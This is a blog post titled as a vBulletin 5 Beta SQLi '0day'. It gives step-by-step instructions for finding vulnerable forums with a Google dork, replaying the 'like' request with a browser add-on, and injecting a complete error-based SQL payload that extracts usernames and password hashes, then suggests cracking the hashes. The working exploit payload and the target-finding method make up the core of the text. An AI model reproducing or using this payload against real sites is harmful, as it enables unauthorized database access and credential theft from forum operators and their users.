vBulletin 5 Beta XX SQLi 0day

Posted By: Unknown | On 06:39 | In Web hacking

SOCIALIZE IT →

Tweet

Hello friends ill show how to exploit the SQLi vulnerability on vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

Things you will need

1.Live http headers addon download from here and install it in firefox

2.Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"

Once you find the site register and login in

Now click on any post at their you will see a like button like this

Now open Live http header addon which we have installed on firefox

Now click on like buttton you will see something like this

Now click on the vote line and press Replay..You will see this

Now after nodeid=8361(number will be different for you) Paste this code

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

Now click on Replay and you will username and pass hash

For decrypting the pass you use different options......

You can go here

THANKS